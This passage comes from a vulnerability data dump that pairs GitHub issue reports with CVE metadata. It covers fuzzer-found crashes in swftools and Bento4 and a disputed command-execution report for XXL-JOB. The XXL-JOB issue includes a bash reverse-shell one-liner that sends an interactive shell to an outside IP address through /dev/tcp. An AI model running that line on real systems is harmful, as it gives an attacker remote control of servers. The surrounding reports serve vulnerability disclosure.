buggy address: 0x0c327fff80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff80e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff80f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff8120: 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa 0x0c327fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==32466==ABORTING ``` ### reproduce please use command : `./gif2swf -o /dev/null [sample file]` to reproduce the crash ### crash_sample [id39_HEAP_BUFFER_OVERFLOW.zip](https://github.com/matthiaskramm/swftools/files/9034335/id39_HEAP_BUFFER_OVERFLOW.zip) ### crash info ``` ==117565==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000271 at pc 0x0000004f9626 bp 0x7ffd465ed6d0 sp 0x7ffd465ed6c8 READ of size 1 at 0x602000000271 thread T0 #0 0x4f9625 in getGifDelayTime /home/bupt/Desktop/swftools/src/gif2swf.c:127:20 #1 0x4f9625 in MovieAddFrame /home/bupt/Desktop/swftools/src/gif2swf.c:451:17 #2 0x4fb9d9 in main /home/bupt/Desktop/swftools/src/gif2swf.c:730:21 #3 0x7ff0fa7dbc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41cfb9 in _start (/home/bupt/Desktop/swftools/build/bin/gif2swf+0x41cfb9) 0x602000000271 is located 0 bytes to the right of 1-byte region [0x602000000270,0x602000000271) allocated by thread T0 here: #0 0x4af580 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7ff0fc10f19a in GifAddExtensionBlock (/usr/lib/x86_64-linux-gnu/libgif.so.7+0x519a) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/src/gif2swf.c:127:20 in getGifDelayTime Shadow bytes around the buggy address: 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fa 0x0c047fff8010: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd 0x0c047fff8020: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa 0x0c047fff8030: fa fa fd fa fa fa fd fa fa fa fd fa fa fa 00 04 =>0x0c047fff8040: fa fa 00 03 fa fa 03 fa fa fa 04 fa fa fa[01]fa 0x0c047fff8050: fa fa 06 fa fa fa 04 fa fa fa 01 fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==117565==ABORTING ``` ### reproduce please use command : `./gif2swf -o /dev/null [sample file]` to reproduce the crash ### crash_sample [id47_HEAP_BUFFER_OVERFLOW.zip](https://github.com/matthiaskramm/swftools/files/9034336/id47_HEAP_BUFFER_OVERFLOW.zip) ### crash info ``` ==117675==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000065f3 at pc 0x0000004f95d9 bp 0x7ffe740a8c50 sp 0x7ffe740a8c48 READ of size 1 at 0x6020000065f3 thread T0 #0 0x4f95d8 in getTransparentColor /home/bupt/Desktop/swftools/src/gif2swf.c:141:20 #1 0x4f95d8 in MovieAddFrame /home/bupt/Desktop/swftools/src/gif2swf.c:269:20 #2 0x4fb9d9 in main /home/bupt/Desktop/swftools/src/gif2swf.c:730:21 #3 0x7f7d9a8e5c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41cfb9 in _start (/home/bupt/Desktop/swftools/build/bin/gif2swf+0x41cfb9) 0x6020000065f3 is located 0 bytes to the right of 3-byte region [0x6020000065f0,0x6020000065f3) allocated by thread T0 here: #0 0x4af580 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f7d9c21919a in GifAddExtensionBlock (/usr/lib/x86_64-linux-gnu/libgif.so.7+0x519a) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/src/gif2swf.c:141:20 in getTransparentColor Shadow bytes around the buggy address: 0x0c047fff8c60: fa fa 06 fa fa fa 04 fa fa fa fd fd fa fa 00 04 0x0c047fff8c70: fa fa 00 00 fa fa 06 fa fa fa 04 fa fa fa 00 00 0x0c047fff8c80: fa fa 06 fa fa fa 04 fa fa fa 04 fa fa fa 00 00 0x0c047fff8c90: fa fa 06 fa fa fa 04 fa fa fa 04 fa fa fa 00 03 0x0c047fff8ca0: fa fa 03 fa fa fa 04 fa fa fa 00 00 fa fa 01 fa =>0x0c047fff8cb0: fa fa 06 fa fa fa 04 fa fa fa 03 fa fa fa[03]fa 0x0c047fff8cc0: fa fa 01 fa fa fa 06 fa fa fa 04 fa fa fa 04 fa 0x0c047fff8cd0: fa fa 00 00 fa fa 06 fa fa fa 04 fa fa fa fa fa 0x0c047fff8ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8d00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==117675==ABORTING ``` ------------------------------------- ## SEGV ### reproduce please use command : `./gif2swf -o /dev/null [sample file]` to reproduce the crash ### crash_sample [id0_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034337/id0_SEGV.zip) ### crash info ``` AddressSanitizer:DEADLYSIGNAL ==32434==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004f63a0 bp 0x7ffe31857cb0 sp 0x7ffe31857ae0 T0) ==32434==The signal is caused by a READ memory access. ==32434==Hint: address points to the zero page. #0 0x4f63a0 in MovieAddFrame /home/bupt/Desktop/swftools/src/gif2swf.c:268:27 #1 0x4fb951 in main /home/bupt/Desktop/swftools/src/gif2swf.c:728:17 #2 0x7fd91af28c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #3 0x41cfb9 in _start (/home/bupt/Desktop/swftools/build/bin/gif2swf+0x41cfb9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/src/gif2swf.c:268:27 in MovieAddFrame ==32434==ABORTING ``` ### reproduce please use command : `./gif2swf -o /dev/null [sample file]` to reproduce the crash ### crash_sample [id31_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034338/id31_SEGV.zip) ### crash info ``` AddressSanitizer:DEADLYSIGNAL ==117415==ERROR: AddressSanitizer: SEGV on unknown address 0x61e000016efe (pc 0x7fb8e4a4e246 bp 0x7ffc023949b0 sp 0x7ffc02394148 T0) ==117415==The signal is caused by a WRITE memory access. #0 0x7fb8e4a4e246 /build/glibc-CVJwZb/glibc-2.27/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:309 #1 0x4ae15b in __asan_memcpy /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 #2 0x4f8251 in MovieAddFrame /home/bupt/Desktop/swftools/src/gif2swf.c:353:25 #3 0x4fb9d9 in main /home/bupt/Desktop/swftools/src/gif2swf.c:730:21 #4 0x7fb8e49b4c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #5 0x41cfb9 in _start (/home/bupt/Desktop/swftools/build/bin/gif2swf+0x41cfb9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /build/glibc-CVJwZb/glibc-2.27/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:309 ==117415==ABORTING ``` ------------------------------------- ## memory leak ### reproduce please use command : `./gif2swf -o /dev/null [sample file]` to reproduce the crash ### crash_sample [id15_memory_leak.zip](https://github.com/matthiaskramm/swftools/files/9034341/id15_memory_leak.zip) ### crash info ``` ==32723==ERROR: LeakSanitizer: detected memory leaks Direct leak of 56 byte(s) in 1 object(s) allocated from: #0 0x4af748 in calloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:154 #1 0x588b93 in rfx_calloc /home/bupt/Desktop/swftools/lib/mem.c:69:9 #2 0x4fb951 in main /home/bupt/Desktop/swftools/src/gif2swf.c:728:17 #3 0x7fb865a10c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 Direct leak of 56 byte(s) in 1 object(s) allocated from: #0 0x4af748 in calloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:154 #1 0x588b93 in rfx_calloc /home/bupt/Desktop/swftools/lib/mem.c:69:9 #2 0x4fb9d9 in main /home/bupt/Desktop/swftools/src/gif2swf.c:730:21 #3 0x7fb865a10c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4af580 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x58897e in rfx_alloc /home/bupt/Desktop/swftools/lib/mem.c:30:9 #2 0x51e69a in swf_ShapeAddBitmapFillStyle /home/bupt/Desktop/swftools/lib/modules/swfshape.c:312:10 #3 0x4fb9d9 in main /home/bupt/Desktop/swftools/src/gif2swf.c:730:21 #4 0x7fb865a10c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4af580 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x58897e in rfx_alloc /home/bupt/Desktop/swftools/lib/mem.c:30:9 #2 0x51e69a in swf_ShapeAddBitmapFillStyle /home/bupt/Desktop/swftools/lib/modules/swfshape.c:312:10 #3 0x4fb951 in main /home/bupt/Desktop/swftools/src/gif2swf.c:728:17 #4 0x7fb865a10c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: 240 byte(s) leaked in 4 allocation(s). info: No menu item '=' in node '(dir)Top'==32723==ERROR: LeakSanitizer: detected memory leaks Direct leak of 56 byte(s) in 1 object(s) allocated from: #0 0x4af748 in calloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:154 #1 0x588b93 in rfx_calloc /home/bupt/Desktop/swftools/lib/mem.c:69:9 #2 0x4fb951 in main /home/bupt/Desktop/swftools/src/gif2swf.c:728:17 #3 0x7fb865a10c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 Direct leak of 56 byte(s) in 1 object(s) allocated from: #0 0x4af748 in calloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:154 #1 0x588b93 in rfx_calloc /home/bupt/Desktop/swftools/lib/mem.c:69:9 #2 0x4fb9d9 in main /home/bupt/Desktop/swftools/src/gif2swf.c:730:21 #3 0x7fb865a10c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4af580 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x58897e in rfx_alloc /home/bupt/Desktop/swftools/lib/mem.c:30:9 #2 0x51e69a in swf_ShapeAddBitmapFillStyle /home/bupt/Desktop/swftools/lib/modules/swfshape.c:312:10 #3 0x4fb9d9 in main /home/bupt/Desktop/swftools/src/gif2swf.c:730:21 #4 0x7fb865a10c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4af580 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x58897e in rfx_alloc /home/bupt/Desktop/swftools/lib/mem.c:30:9 #2 0x51e69a in swf_ShapeAddBitmapFillStyle /home/bupt/Desktop/swftools/lib/modules/swfshape.c:312:10 #3 0x4fb951 in main /home/bupt/Desktop/swftools/src/gif2swf.c:728:17 #4 0x7fb865a10c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: 240 byte(s) leaked in 4 allocation(s). ```
bug found in swftools-gif2swf
https://api.github.com/repos/swftools/swftools/issues/181/comments
0
2022-07-03T08:28:59Z
2022-07-04T03:28:11Z
https://github.com/swftools/swftools/issues/181
1,292,243,070
181
CVE-2022-40929
2022-09-28T18:15:09.813
XXL-JOB 2.2.0 has a Command execution vulnerability in background tasks. NOTE: this is disputed because the issues/4929 report is about an intended and supported use case (running arbitrary Bash scripts on behalf of users).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/2979" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C7AE69F1-6781-47B8-933D-989F4EF5ED19", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/xuxueli/xxl-job/issues/2979
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xuxueli", "xxl-job" ]
后台任务存在命令执行漏洞 ### Which version of XXL-JOB do you using? XXL-JOB 2.2.0 --- ### 利用流程 #### 新建任务 <img width="899" alt="截屏2022-09-13 下午7 26 54" src="https://user-images.githubusercontent.com/72059221/189889779-75d361a8-0edf-4c24-803d-8cbd40709df2.png"> #### 选择IDE 编辑 <img width="148" alt="截屏2022-09-13 下午7 27 05" src="https://user-images.githubusercontent.com/72059221/189889860-b59e2d0e-6770-406f-869d-935c72d6e088.png"> #### 反弹shell <img width="785" alt="截屏2022-09-13 下午7 27 38" src="https://user-images.githubusercontent.com/72059221/189889890-3c485fd7-b2ea-4eeb-841e-79309d8a2840.png"> #### Code. ``` #!/bin/bash echo "xxl-job: hello shell" echo "脚本位置:$0" echo "任务参数:$1" echo "分片序号 = $2" echo "分片总数 = $3" echo "`bash -c 'exec bash -i &>/dev/tcp/xx.xx.xx.xx/15326 <&1'`" echo "Good bye!" exit 0 ```
后台任务存在命令执行漏洞
https://api.github.com/repos/xuxueli/xxl-job/issues/2979/comments
0
2022-09-13T11:30:39Z
2022-09-13T11:30:39Z
https://github.com/xuxueli/xxl-job/issues/2979
1,371,299,019
2,979
CVE-2022-41841
2022-09-30T05:15:11.260
An issue was discovered in Bento4 through 1.6.0-639. A NULL pointer dereference occurs in AP4_File::ParseStream in Core/Ap4File.cpp, which is called from AP4_File::AP4_File.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/779" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*", "matchCriteriaId": "180AEBD6-AF89-4F0F-856E-D8B977C762C0", "versionEndExcluding": null, "versionEndIncluding": "1.6.0-639", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/779
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hello, I use my fuzzer to fuzz binary mp4tag and binary mp42hevc , and found some crashes. The bug1 is different from issue #295, because i run the test-001.mp4 finding it useless. Here are the details. # Bug1 ``` ┌──(kali㉿kali)-[~/Desktop/Bento4/cmakebuild] └─$ ./mp4tag mp4tag_poc ERROR: cannot open input file ================================================================= ==2376684==ERROR: LeakSanitizer: detected memory leaks Direct leak of 40 byte(s) in 1 object(s) allocated from: #0 0x4c93dd in operator new(unsigned long) (/home/kali/Desktop/Bento4/cmakebuild/mp4tag+0x4c93dd) #1 0x4ccf5e in ParseCommandLine(int, char**) /home/kali/Desktop/Bento4/Source/C++/Apps/Mp4Tag/Mp4Tag.cpp:207:34 #2 0x4ccf5e in main /home/kali/Desktop/Bento4/Source/C++/Apps/Mp4Tag/Mp4Tag.cpp:783:5 #3 0x7f1b3ea14209 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 SUMMARY: AddressSanitizer: 40 byte(s) leaked in 1 allocation(s). ``` # Bug2 ``` ┌──(kali㉿kali)-[~/Desktop/Bento4/cmakebuild] └─$ ./mp42hevc mp42hevc_poc /dev/null 1 ⨯ ERROR: cannot open input (-5) AddressSanitizer:DEADLYSIGNAL ================================================================= ==2392528==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004d52c3 bp 0x7fff8ac3ad90 sp 0x7fff8ac3ac40 T0) ==2392528==The signal is caused by a READ memory access. ==2392528==Hint: address points to the zero page. #0 0x4d52c3 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/kali/Desktop/Bento4/Source/C++/Core/Ap4File.cpp:103:12 #1 0x4d5aea in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/kali/Desktop/Bento4/Source/C++/Core/Ap4File.cpp:78:5 #2 0x4cbea4 in main /home/kali/Desktop/Bento4/Source/C++/Apps/Mp42Hevc/Mp42Hevc.cpp:374:32 #3 0x7fd8587a8209 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #4 0x7fd8587a82bb in __libc_start_main csu/../csu/libc-start.c:389:3 #5 0x41f600 in _start (/home/kali/Desktop/Bento4/cmakebuild/mp42hevc+0x41f600) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/kali/Desktop/Bento4/Source/C++/Core/Ap4File.cpp:103:12 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) ==2392528==ABORTING ``` # Environment ``` clang 11.0.1 clang++ 11.0.1 version:master branch(commit[5b7cc25](https://github.com/axiomatic-systems/Bento4/commit/5b7cc2500d514717a64675fcf631939494c074ce))+Bento4-1.6.0-639 ``` # Platform ``` └─$ uname -a 1 ⨯ Linux kali 5.10.0-kali9-amd64 #1 SMP Debian 5.10.46-4kali1 (2021-08-09) x86_64 GNU/Linux ``` # How to reproduce ``` export CC=clang export CXX=clang++ export CFLAGS="-fsanitize=address -g" export CXXFLAGS="-fsanitize=address -g" mkdir cmakebuild cd cmakebuild cmake -DCMAKE_BUILD_TYPE=Release .. make ``` # Note ``` I find the two bugs not only exist in latest branch but also exist in latest release version Bento4-1.6.0-639. ``` # POC [poc_Bento4.zip](https://github.com/axiomatic-systems/Bento4/files/9653209/poc_Bento4.zip) # Credit Yuhang Huang ([NCNIPC of China](http://www.nipc.org.cn/)),(Zhongguancun Laboratory) Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)),(Zhongguancun Laboratory) Wanying Cao, Mengyue Feng([NCNIPC of China](http://www.nipc.org.cn/)),(Zhongguancun Laboratory) Thansk for your time!
There are some vulnerabilities in Bento4
https://api.github.com/repos/axiomatic-systems/Bento4/issues/779/comments
0
2022-09-27T08:01:55Z
2023-06-26T06:51:17Z
https://github.com/axiomatic-systems/Bento4/issues/779
1,387,303,483
779
CVE-2022-41845
2022-09-30T05:15:11.787
An issue was discovered in Bento4 1.6.0-639. There ie excessive memory consumption in the function AP4_Array<AP4_ElstEntry>::EnsureCapacity in Core/Ap4Array.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/747" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/770" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/747
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, i find 3 out-of-memory errors in Bento4. I saved all my test files [here](https://github.com/WorldExecute/files/tree/main/Bento4) Here are the details. For **mp4audioclip** with [test input](https://github.com/WorldExecute/files/tree/main/Bento4/mp4audioclip/out-of-memory): ``` test_1: ================================================================= ==6930==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0xffffff1e0 bytes #0 0x4c560d in operator new(unsigned long) (/Bento4/install-asan/bin/mp4audioclip+0x4c560d) #1 0x5dce28 in AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity(unsigned int) /Bento4/Source/C++/Core/Ap4Array.h:172:25 #2 0x5dce28 in AP4_Array<AP4_TrunAtom::Entry>::SetItemCount(unsigned int) /Bento4/Source/C++/Core/Ap4Array.h:210:25 #3 0x5dce28 in AP4_TrunAtom::AP4_TrunAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /Bento4/Source/C++/Core/Ap4TrunAtom.cpp:127:15 #4 0x5dc1f9 in AP4_TrunAtom::Create(unsigned int, AP4_ByteStream&) /Bento4/Source/C++/Core/Ap4TrunAtom.cpp:51:16 #5 0x50e852 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:438:20 #6 0x50bab9 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #7 0x5240d7 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #8 0x5231a3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 #9 0x5231a3 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20 #10 0x50dcd2 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20 #11 0x50bab9 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #12 0x5240d7 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #13 0x5231a3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 #14 0x5231a3 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20 #15 0x50dcd2 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20 #16 0x50bab9 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #17 0x541dd9 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4DrefAtom.cpp:84:16 #18 0x5416e8 in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4DrefAtom.cpp:50:16 #19 0x50e924 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:580:20 #20 0x50bab9 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #21 0x523ea7 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #22 0x5231a3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 #23 0x5231a3 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20 #24 0x50dcd2 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20 #25 0x50bab9 